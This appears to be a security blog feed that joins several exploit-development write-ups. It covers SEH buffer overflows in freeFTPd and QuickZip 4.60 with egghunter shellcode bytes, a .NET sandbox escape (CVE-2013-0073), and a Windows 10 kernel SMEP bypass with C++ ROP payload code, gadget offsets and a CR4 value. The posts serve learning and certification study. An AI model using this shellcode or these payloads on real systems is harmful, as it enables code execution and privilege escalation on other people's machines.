Also, note that we will need to find an address in a module that has SAFESEH and ASLR disabled.

We will use address 0x0041B865

Again, we update our POC with our SEH Handler redirect address

We send our exploit up and we have successfully redirected code execution as we hit our POP-POP-RET address.

We follow the POP-POP-RET and we hit our nSEH which is just right below our As

Note: We currently do not see our Ds.

...however, if we scroll further down, we can see that our Ds are still loaded in memory. We just need to find them...aka. egghunter.

First Jump

Since our first jump is limited to just 4 bytes, we will do a 2-byte reverse short jmp

EB 80, or a short jmp backwards by 128 bytes.

We update our nSEH with EB 80 and add 2 NOPs (not necessary) to complete the 4 bytes.

We fire up the POC one more time, take the pop-pop-ret, and hit our first jump
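As a small sketch of what those 8 bytes look like in the buffer, the snippet below packs the nSEH and SEH values from this write-up. The variable names are my own, and the padding before and after the record is left out because the offsets are only shown in the screenshots.

```python
import struct

POP_POP_RET = 0x0041B865  # address chosen above

# nSEH: short jump backwards (EB 80) padded with two NOPs to fill 4 bytes.
nseh = b"\xEB\x80" + b"\x90\x90"

# SEH handler: the POP-POP-RET address in little-endian byte order.
seh = struct.pack("<I", POP_POP_RET)

# On the stack the nSEH field sits directly before the handler pointer.
seh_record = nseh + seh
print(seh_record.hex(" ").upper())
```

Neither field contains 0x0a, the one character this write-up later identifies as restricted.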

Restricted characters

After going through the 256 hex characters, we found that 0xa is the only restricted character

So far, we have accomplished the following:

1. Successfully crashed the program and overwrote the SEH and nSEH

2. Calculated the offset values

3. Found POP-POP-RET address

4. Completed the first jump from nSEH which allows 127 bytes of address space

Egg...hunting!

Reminder...you can create an egghunter using mona.py

Note: I am using a slightly different egghunter shellcode.

We update our POC with our egghunter shellcode and add the egg in front of our Ds

Send the exploit up...take the first jump (EB 80) and we land on our NOP sled.

If we scroll down, our egghunter is right below our NOP sled.

We let the egghunter execute while adding a breakpoint at JMP EDI to check the value of EDI.

Here we can see that we have successfully located our egg...all that we need to do now is add our reverse shellcode right after our egg.

At this point we are ready to add our reverse shell

Final Proof-of-Concept: https://github.com/pyt3ra/freeFTPd-1.0.10-SEH-Based-Buffer-Overflow

PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more)

Winsider Seminars & Solutions Inc.

By: Yarden Shafir & Alex Ionescu

12 May 2020 at 18:13

[…]

QuickZip 4.60 SEH Based Buffer Overflow w/ Egghunter

Pyt3ra Security Blogs

By: Ymir F. Eboras | OSCE | OSCP | SLAE| MS. Comp Science

10 May 2020 at 08:46

Structured Exception Handling (SEH) Based Buffer Overflow Vulnerability

Kali Linux

Windows Vista

QuickZip 4.60

Bug found by: corelancod3r (http://corelan.be:8800)

Software Link: http://www.quickzip.org/downloads.html

GitHub:https://github.com/pyt3ra/QuickZip_4_60_SEH-Based-Buffer-Overflow

~~~~~~//******//~~~~~~

This is another SEH based buffer overflow with an egghunter implementation. A more detailed explanation that I wrote about an egghunter implementation can be found here: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

You can find numerous write-ups about this vulnerability and how to exploit it. This buffer overflow vulnerability gives us a good mix of shellcode encoding due to restricted characters as well as how to implement an egghunter.

I'm doing this as part of my preparation for the Offensive Security Certified Expert (OSCE) certification

0x0 - Setup

Our Proof-of-Concept creates a .zip file that we will access using QuickZip.

0x1 - Fuzzing

As usual, step one in exploit development is fuzzing. This allows us to examine how the program responds when we introduce an oversized buffer to it.

We will be using the fuzzer from corelan as shown below.

We examine the crash using Immunity Debugger and we can see that we have successfully overwritten the SEH handler with 41s.

0x2 - Calculating the offset

We will utilize Metasploit's pattern_create.rb and pattern_offset.rb

First, we create unique characters of 4068 bytes and update our POC

We check the SEH chain after the crash to get the offset values

SEH: 6B41396A

nSEH: 41386A41

Second, we calculate these values using pattern_offset.rb

Finally, we update our POC and verify if these values are correct.

If everything is correct, we should see Bs at byte 294 and Cs at byte 298.

Our values are correct as we see the 43s and 42s overwrite both SEH and nSEH respectively.
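If you want to double-check the offsets without Metasploit, the cyclic pattern is easy to reproduce. The following is a minimal re-implementation of the idea (upper-case letter, lower-case letter, digit triples), not Metasploit's own code, and the function names simply mirror the tool names.

```python
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Build an 'Aa0Aa1Aa2...' style cyclic pattern of the requested length."""
    chunks = []
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(pattern, value):
    """Find where a 32-bit value read from a register sits in the pattern."""
    # The debugger shows the dword as a number, so convert it back to the
    # little-endian byte order it had in memory before searching.
    return pattern.find(struct.pack("<I", value))


pattern = pattern_create(4068)
print("nSEH offset:", pattern_offset(pattern, 0x41386A41))
print("SEH offset: ", pattern_offset(pattern, 0x6B41396A))
```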

0x3 - Verifying Restricted Characters

At this point, we are now ready to find an address to redirect the SEH handler. However, before we waste our time looking for an address, we will need to verify first if there are restricted characters.

First, I worked on the first 128 bytes (x01 to x7F)

I sent the characters to the program and carefully watched how the program responded to them. If a character gets mangled/truncated/updated, then it's a bad character.

After numerous tries, I was able to narrow down the restricted characters to the following:

'\x10\x0f\x14\x15\x2f\x3d\x3a\x5b'

Updated POC below:

Second, I worked with the other 128 bytes (x80 to xff)

Interestingly, hex characters 80 and above are changed to an arbitrary hex character.

I sent the following characters...

...and we see the following conversion in Immunity Debugger

The table below shows the conversion (not a complete list).

0x4 - POP-POP-RET address!

Now that we know which characters are not allowed, we are ready to find a POP-POP-RET address.

Lucky for us, Immunity Debugger's mona.py module enables an easier way to find a POP-POP-RET address.

There were multiple addresses found.

Although not ideal since it has null bytes, we will be using address 00435133

We can verify that this is indeed a POP-POP-RET address by searching for it.

We can update our POC with this address and see if our SEH handler gets redirected to it.

Note that the address has to be in little-endian.

We fire up the POC and we have successfully redirected the SEH handler as shown below:

…once we take the pop-pop-ret, we then get redirected to our nseh values (EBs)

Note that our Ds are nowhere to be found now; however, our As are easily accessible, sitting right above our nSEH. This means our initial jump will have to be a reverse jump towards the beginning of our As, which should get us at least 127 bytes of address space from which to jump further to a bigger space (the Ds location).

0x5 - First Jump

Normally, we would be able to easily do a reverse short jump with EB 80. However, note that any hex character of 80 or over is restricted and is converted to a different hex character.

More info about jump shorts (forward and reverse) can be found here: https://thestarman.pcministry.com/asm/2bytejumps.htm

If we go back to our bad characters table…we can see that hex 89 and 9F translate to EB and 83 respectively.

89	EB
9F	83

Here's how the EB 83 instructions would work as shown in Immunity.

We can now update our POC with our first jump

We see our EB 83 first jump in SEH chain

We take the pop-pop-ret and we successfully hit our first jump…from 0012FBB0 to 0012FB35
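The landing address can be checked with a few lines of Python. A short jump (`EB rel8`) is 2 bytes long and its signed 8-bit displacement is counted from the end of the instruction. In the sketch below, the `TRANSLATION` table only holds the two conversions quoted above, and the function names are my own.

```python
# The two byte conversions taken from the bad-characters table above.
TRANSLATION = {0x89: 0xEB, 0x9F: 0x83}


def as_seen_by_program(sent):
    """Apply the known conversions to the bytes we send."""
    return bytes(TRANSLATION.get(b, b) for b in sent)


def short_jump_target(instr_addr, opcode_bytes):
    """Compute where an EB rel8 short jump located at instr_addr lands."""
    assert len(opcode_bytes) == 2 and opcode_bytes[0] == 0xEB
    rel8 = int.from_bytes(opcode_bytes[1:2], "little", signed=True)
    return instr_addr + 2 + rel8


jump = as_seen_by_program(b"\x89\x9F")  # what we send becomes EB 83
print(jump.hex(" ").upper())
print(f"{short_jump_target(0x0012FBB0, jump):08X}")
```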

0x6 - Second Jump - Egghunter

Remember that the address space holding our Ds has gone missing from view (it is still in memory). Ideally, this is where our reverse shellcode would be.

Note above that our dump doesn't show our Ds anywhere close to our As.

Just because we can't find it doesn't mean it is missing…this is where an egghunter shellcode comes into play.

Here's a write-up that I did about egghunter: https://www.pyt3ra.com/2020/03/slae-assignment-3.html

Mona.py also has a module to create an egghunter.

Note: I will be using a different egghunter

Due to restricted characters, we will need to carve out our egghunter shellcode, so I will be using the egghunter shellcode that I used for OSCE prep (I spent way too much time carving them).

Also, note that I did another EB 83 at the beginning of our second jump to allow another 120+ bytes of address space, as I noticed that the first jump didn't give us enough space

Before we can start carving out the egghunter shellcode, we will need to align the ESP to point to the space below our first EB 08 at address 0012FB8D--this is where our egghunter shellcode will be decoded.

We can see that ESP is currently pointed at 0012F574 and we want it to point to 0012FB8D

We will need to add 1561 (0x619) to ESP

To align ESP, we need the following instructions:

PUSH ESP

POP EAX

ADD AX, 619

PUSH EAX

POP ESP

Keep in mind that we still need to avoid restricted characters...fortunately, the opcodes that correspond to these instructions are not restricted
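Here is a quick sketch of that check in Python. The opcode bytes are the standard x86 encodings for the five instructions listed above, the restricted set combines the characters found in 0x3 with everything from 0x80 upwards, and the helper name `is_restricted` is my own.

```python
import struct

# Restricted characters found earlier, plus every byte from 0x80 upwards.
BAD_CHARS = bytes.fromhex("100f14152f3d3a5b")


def is_restricted(byte):
    return byte in BAD_CHARS or byte >= 0x80


CURRENT_ESP = 0x0012F574
WANTED_ESP = 0x0012FB8D
delta = WANTED_ESP - CURRENT_ESP  # 0x619, i.e. 1561 in decimal

align_esp = (
    b"\x54"                                  # PUSH ESP
    + b"\x58"                                # POP EAX
    + b"\x66\x05" + struct.pack("<H", delta)  # ADD AX, 0x619
    + b"\x50"                                # PUSH EAX
    + b"\x5C"                                # POP ESP
)

print(hex(delta), align_esp.hex(" ").upper())
print("restricted bytes:", [hex(b) for b in align_esp if is_restricted(b)])
```

Using the 16-bit `ADD AX` form keeps the immediate down to two small bytes, which only works here because adding 0x619 does not carry out of the low 16 bits of ESP.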

We execute the following instructions and we can see that our ESP now points to 0012FB8D

Again, we update our POC with our initial ESP realignment which will be the beginning of our egghunter shellcode

With our ESP aligned to where we want it to point....we can start carving out our egghunter shellcode.

Here's the original egghunter shellcode broken down into 4 bytes

#original egg hunter shellcode

\x66\x81\xcA\xFF

\x0F\x42\x52\x6A

\x02\x58\xCD\x2E

\x3C\x05\x5A\x74

\xEF\xb8\x54\x30

\x30\x57\x8b\xFA

\xAF\x75\xea\xAF

\x75\xE7\xFF\xE7

We will be using the EAX register to carve out the egghunter. Note that we need to zero out EAX first before we execute SUB instructions. We start from the last 4 bytes and work our way up.

zero_out_eax = "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"

This whole carving thing is straight black magic...it never ceases to amaze me.

#\x75\xe7\xff\xe7

#using hex/dword in windows calc

#0 - E7FFE775 = 1800 188B

#7950 5109 + 7950 5109 + 255F7679 = 1800 188B

#0 - 79505109 - 79505109 - 255F7679 = E7FFE775

These 4 bytes are encoded as SUB instructions on a zeroed EAX: after the three subtractions EAX holds the desired 4 bytes, which then get pushed to the stack, so they end up decoded at the address ESP points to.

We will be doing this for the other 28 bytes

#\xaf\x75\xea\xaf

#using hex/dword in windows calc

#0 - AFEA75AF = 5015 8A51

#71094404 + 71094404 + 6E03 0249 = 5015 8A51

#0 - 71094404 - 71094404 - 6E03 0249 = AFEA75AF

#\x30\x57\x8b\xfa

#using hex/dword in windows calc

#0 - FA8B 5730 = 0574 A8D0

#55093131 + 55093131 + 5B62 466E = 0574 A8D0

#0 - 55093131 - 55093131 - 5B62 466E = FA8B 5730

#\xef\xb8\x54\x30

#using hex/dword in windows calc

#0 - 3054 B8EF = CFAB 4711

#56316666 + 56316666 + 2348 7A45 = CFAB 4711

#0 - 56316666 - 56316666 - 2348 7A45 = 3054 B8EF

At this point, we have successfully carved out the first 16 bytes of our egghunter shellcode.

Note that we are getting close to our second EB 83 jmp…we will need to jump over this to get to the next 127 bytes of address space

I made a mistake on the ESP realignment that resulted in wasted address space. ESP should have been pointed at the end of our 41s: as the stack grows, it moves toward lower addresses.

This means we need ESP to be pointing at address 0012FBAC

Adjusted ESP alignment

This gives us about 32 extra bytes of address space….every byte counts!

We finish up the first 128 bytes by adding the first half of our zero_out_eax instructions and adding a jump short of 10 bytes to get over the second EB 83 (I think we could have looped around too and just overwritten the first 16 bytes of our egghunter shellcode).

Our jump short brings us from address 0012FB2F to 0012FB3B and we successfully get over the second EB 83

Now we continue encoding the rest of our egghunter shellcode

#\x3c\x05\x5a\x74

#using hex/dword in windows calc

#0 - 745A053C = 8BA5 FAC4

#41214433 + 41214433 + 0963 725E = 8BA5 FAC4

#0 - 41214433 - 41214433 - 0963 725E = 745A053C

#\x02\x58\xcd\x2e

#using hex/dword in windows calc

#0 - 2ECD5802 = D132 A7FE

#657F3165 + 657F3165 + 06344534 = D132 A7FE

#0 - 657F3165 - 657F3165 - 06344534 = 2ECD5802

Finally, we hit our last 4 bytes

That completes our egghunter shellcode…with literally 6 bytes left to spare with our address space

To test if our egghunter can find our egg, we add our egg "T00W" to the beginning of our Ds…and see if we can find it

...and we are successful. We found our Ds address space.

0x7 - Shellcode time!

I created a calc shellcode to see if we are able to pop a shellcode.

We go through our egghunter and add a breakpoint right before the jmp edi instruction and we can see that edi points to the beginning of our calc shellcode

Everything looks good; however, our shellcode just keeps crashing the program instead of spawning calc.exe

After some research, it looks like ESP has to be realigned.

We point ESP at the address in EDX....then align it to a 16-byte boundary (which also makes it divisible by 4)

PUSH EDX

POP ESP

AND ESP, 0xFFFFFFF0 ----> clears the low 4 bits, making ESP divisible by 16 (and therefore by 4)

I update the shellcode to a reverse shell…pop the exploit one more time and we get a reverse shell

Final POC in my GitHub.

Thanks for reading!

Tyranid's Lair
Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)
By: tiraniddo
7 May 2020 at 23:12

It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox: I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers,
dynamic methods or methods outside the delegate creator's assembly.

I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such as a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like the following?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath");

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression<EventHandler> lambda = (o,e) => File.OpenRead(@"C:\SomePath");
EventHandler f = lambda.Compile();

We're still using a lambda, surely nothing has changed? Well, let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll create something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with an expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never fully scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context, including things like JavaScript engines such as V8 or JSCore.

The Summer of PWN

The Human Machine Interface

By: h0mbre

5 May 2020 at 04:00

Summer Plans

Now that I finished the HEVD series of posts, it’s time for me to switch gears. The series became more of a chore as I progressed and the exercise felt quite silly for a few reasons. Primarily, there are still so many fundamental binary exploitation concepts that I still don’t know. Why was I spending so much time on very esoteric material when I haven’t even accomplished the basics? The material was tied closely to my wanting to take AWE with Offsec, but since that is not happening, I get to focus now on going back to the basics.

For the foreseeable future, I’m going to be working primarily on leveling up my pwn skills by doing CTF challenges, reversing, analyzing malware, and developing.

Some of the tools I’m going to be using this summer (I’ll update this as I go along):

I will be keeping a daily log of everything I do and will publish it so those trying to accomplish similar goals can see what I tried. I’ll also make a post at the end detailing what went right and what went wrong.

I’m taking a purposeful break from blogging so that I can focus on leveling up. Blogging takes a lot of my time and it’s interfering with my ability to put hours into getting better. I will hopefully be able to do a write-up detailing how I exploited a bug I found in another Windows kernel mode driver.

Keeping track of the Linux pwn challenge exploits here.

Until then, see you on the other side!

The Human Machine Interface
HEVD Exploits – Windows 10 x64 Stack Overflow SMEP Bypass
By: h0mbre
4 May 2020 at 04:00

Introduction

This is going to be my last HEVD blog post. These were all of the exploits I wanted to hit when I started this goal in late January. We did quite a few, though there are definitely some interesting ones left on the table and there are all of the Linux exploits as well. I’ll speak more about future posts in a future post (haha). I used Hacksys Extreme Vulnerable Driver 2.0 and Windows 10 Build 14393.rs1_release.160715-1616 for this exploit. Some of the newer Windows 10 builds were bugchecking this technique.

All of the exploit code can be found here.

Thanks

To @Cneelis for having such great shellcode in his similar exploit on a different Windows 10 build here: https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
To @abatchy17 for his awesome blog post on his SMEP bypass here: https://www.abatchy.com/2018/01/kernel-exploitation-4
To @ihack4falafel for helping me figure out where to return to after running my shellcode.

And as this is the last HEVD blog post, thanks to everyone who got me this far. As I’ve said every post so far, nothing I was doing is my own idea or technique; I was simply recreating their exploits (or at least trying to) in order to learn more about the bug classes and learn more about the Windows kernel. (More thoughts on this later in a future blog post).

SMEP

We’ve already completed a Stack Overflow exploit for HEVD on Windows 7 x64 here; however, the problem is that starting with Windows 8, Microsoft implemented a new mitigation by default called Supervisor Mode Execution Prevention (SMEP). SMEP detects when the CPU, running in kernel mode, tries to execute code that resides in userspace pages, which stops us from hijacking execution in the kernel and sending it to our shellcode pointer residing in userspace.

Bypassing SMEP

Taking my cues from Abatchy, I decided to try and bypass SMEP by using a well-known ROP chain technique that utilizes segments of code in the kernel to disable SMEP and then heads to user space to call our shellcode.

In the linked material above, you see that the CR4 register is responsible for enforcing this protection and if we look at Wikipedia, we can get a complete breakdown of CR4 and what its responsibilities are:

Bit 20 | SMEP | Supervisor Mode Execution Protection Enable | If set, execution of code in a higher ring generates a fault.

So bit 20 of CR4 (counting from bit 0) indicates whether or not SMEP is enforced. Since this vulnerability we’re attacking gives us the ability to overwrite the stack, we’re going to utilize a ROP chain consisting only of kernel space gadgets to disable SMEP by placing a new value in CR4 and then hit our shellcode in userspace.

Getting Kernel Base Address

The first thing we want to do is get the base address of the kernel. Because of ASLR the kernel is loaded at a different address on each boot, so without the base address we can’t turn the offsets of the gadgets we want to use into real addresses. In WinDBG, you can simply run lm sm to list all loaded kernel modules alphabetically:

---SNIP---
fffff800`10c7b000 fffff800`1149b000   nt
---SNIP---

We need a way also to get this address in our exploit code. For this part, I leaned heavily on code I was able to find by doing google searches with some syntax like: site:github.com NtQuerySystemInformation and seeing what I could find. Luckily, I was able to find a lot of code that met my needs perfectly. Unfortunately, on Windows 10 in order to use this API your process requires some level of elevation. But, I had already used the API previously and was quite fond of it for giving me so much trouble the first time I used it to get the kernel base address and wanted to use it again but this time in C++ instead of Python.

Using a lot of the tricks that I learned from @tekwizz123’s HEVD exploits, I was able to get the API exported to my exploit code and was able to use it effectively. I won’t go too much into the code here, but this is the function and the typedefs it references to retrieve the base address to the kernel for us:

typedef struct SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    ULONG                Reserved3;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 LoadCount;
    WORD                 NameOffset;
    CHAR                 Name[256];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 0xb
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS(WINAPI* PNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
    );

INT64 get_kernel_base() {

    cout << "[>] Getting kernel base address..." << endl;

    //https://github.com/koczkatamas/CVE-2016-0051/blob/master/EoP/Shellcode/Shellcode.cpp
    //also using the same import technique that @tekwizz123 showed us

    PNtQuerySystemInformation NtQuerySystemInformation =
        (PNtQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {

        cout << "[!] Failed to get the address of NtQuerySystemInformation." << endl;
        cout << "[!] Last error " << GetLastError() << endl;
        exit(1);
    }

    ULONG len = 0;
    NtQuerySystemInformation(SystemModuleInformation,
        NULL,
        0,
        &len);

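    // The buffer only holds data, so read/write access is enough
    PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)
        VirtualAlloc(NULL,
            len,
            MEM_RESERVE | MEM_COMMIT,
            PAGE_READWRITE);

    if (!pModuleInfo) {
        cout << "[!] Failed to allocate the module list buffer." << endl;
        exit(1);
    }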

    NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation,
        pModuleInfo,
        len,
        &len);

    if (status != (NTSTATUS)0x0) {
        cout << "[!] NtQuerySystemInformation failed!" << endl;
        exit(1);
    }

    PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;

    cout << "[>] ntoskrnl.exe base address: 0x" << hex << kernelImageBase << endl;

    return (INT64)kernelImageBase;
}

This code imports NtQuerySystemInformation from ntdll.dll and allows us to use it with the System Module Information parameter which returns to us a nice struct of a ModulesCount (how many kernel modules are loaded) and an array of the Modules themselves which have a lot of struct members including a Name. In all my research I couldn’t find an example where the kernel image wasn’t index value 0 so that’s what I’ve implemented here.

You could use a lot of the cool string functions in C++ to easily get the base address of any kernel mode driver as long as you have the name of the .sys file. You could cast the Modules.Name member to a string and do a substring match routine to locate your desired driver as you iterate through the array and return the base address. So now that we have the base address figured out, we can move on to hunting the gadgets.

Hunting Gadgets

The value of these gadgets is that they reside in kernel space so SMEP can’t interfere here. We can place them directly on the stack and overwrite rip so that we are always executing the first gadget and then returning to the stack where our ROP chain resides without ever going into user space. (If you have a preferred method for gadget hunting in the kernel let me know, I tried to script some things up in WinDBG but didn’t get very far before I gave up after it was clear it was super inefficient.) Original work on the gadget locations as far as I know is located here: http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html

Again, just following along with Abatchy’s blog, we can find Gadget 1 by locating a gadget that allows us to place a value of our choosing into rcx (which will later be moved into cr4) and then takes a ret soon after. Luckily for us, this gadget exists inside of nt!HvlEndSystemInterrupt.

We can find it in WinDBG with the following:

kd> uf HvlEndSystemInterrupt
nt!HvlEndSystemInterrupt:
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

nt!HvlEndSystemInterrupt+0x18:
fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

nt!HvlEndSystemInterrupt+0x1e:
fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

As Abatchy did, I’ve added a comment so you can see the gadget we’re after. We want this pop rcx; ret routine because if we can place an arbitrary value into rcx, there is a second gadget which allows us to mov cr4, rcx and then we’ll have everything we need.

Gadget 2 is nested within the KiEnableXSave kernel routine as follows (with some snipping) in WinDBG:

kd> uf nt!KiEnableXSave
nt!KiEnableXSave:

---SNIP---

nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret

So with these two gadgets locations known to us, as in, we know their offsets relative to the kernel base, we can now implement them in our code. So to be clear, our payload that we’ll be sending will look like this when we overwrite the stack:

‘A’ characters * 2056
our pop rcx gadget
The value we want rcx to hold
our mov cr4, rcx gadget
pointer to our shellcode.

So for those following along at home, we will overwrite rip with our first gadget, it will pop the first 8 byte value on the stack into rcx. What value is that? Well, it’s the value that we want cr4 to hold eventually and we can simply place it onto the stack with our stack overflow. So we will pop that value into rcx and then the gadget will hit a ret opcode which will send the rip to our second gadget which will mov cr4, rcx so that cr4 now holds the SMEP-disabled value we want. The gadget will then hit a ret opcode and return rip to where? To a pointer to our userland shellcode that it will now run seamlessly because SMEP is disabled.

You can see this implemented in code here:

    BYTE input_buff[2088] = { 0 };

    INT64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    cout << "[>] POP RCX gadget located at: 0x" << pop_rcx_offset << endl;
    INT64 rcx_value = 0x70678; // value we want placed in cr4
    INT64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    cout << "[>] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << endl;


    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PINT64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PINT64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PINT64)&shellcode_addr, 8); // shellcode

CR4 Value

Again, just following along with Abatchy, I’ll go ahead and place the value 0x70678 into cr4. In binary, this is 1110000011001111000, which means that bit 20 (counting from bit 0), the SMEP bit, is set to 0. You can read more about what values to input here on j00ru’s blog post about SMEP.

So if cr4 holds this value, SMEP should be disabled.

Restoring Execution

The hardest part of this exploit for me was restoring execution after the shellcode ran. Unfortunately, our exploit overwrites several register values and corrupts our stack quite a bit. When my shellcode is done running (not really my shellcode, it’s borrowed from @Cneelis), this is what my callstack looked like along with my stack memory values:

Restoring execution will always be pretty specific to what version of HEVD you’re using and also perhaps what build of Windows you’re on, as some of the kernel routines will change, so I won’t go too much in depth here. But what I figured out, after crashing so many times when returning to the address in the screenshot of HEVD!IrpDeviceIoCtlHandler+0x19f (located on the right-hand side of the screenshot at ffff9e8196b99158), is that rsi is typically zeroed out if you send regular-sized buffers to the driver routine.

So if you were to send a non-overflowing buffer, and put a breakpoint at nt!IopSynchronousServiceTail+0x1a0 (which is where rip would return if we took a ret out of our address of ffff9e8196b99158), you would see that rsi is typically 0 when system service routines exit normally, so when I returned, I had to have an rsi value of 0 in order to avoid an exception.

I tried just following the code through until I reached an exception with a non-zero rsi but wasn’t able to pinpoint exactly where the fault occurs or why. The debug information I got from all my bugchecks didn’t bring me any closer to the answer (probably user error). I noticed that if you don’t null out rsi before returning, rsi wouldn’t be referenced in any way until a value was popped into it from the stack which happened to be our IOCTL code, so this confused me even more.

Anyways, my hacky way of tracing through normally sized buffers and taking notes of the register values at the same point we return to out of our shellcode did work, but I’m still unsure why 😒.

Conclusion

All in all, the ROP chain to disable SMEP via cr4 wasn’t too complicated, this could even serve as introduction to ROP chains for some in my opinion because as far as ROP chains go this is fairly straightforward; however, restoring execution after our shellcode was a nightmare for me. A lot of time wasted by misinterpreting the callstack readouts from WinDBG (a lesson learned). As @ihack4falafel says, make sure you keep an eye on @rsp in your memory view in WinDBG anytime you are messing with the stack.

Exploit code here.

Thanks again to all the bloggers who got me through the HEVD exploits:

FuzzySec
r0oki7
Tekwizz123
Abatchy
everyone else I’ve referenced in previous posts!

Huge thanks to HackSysTeam for developing the driver for us to all practice on, can’t wait to tackle it on Linux!

#include <iostream>
#include <string>
#include <Windows.h>

using namespace std;

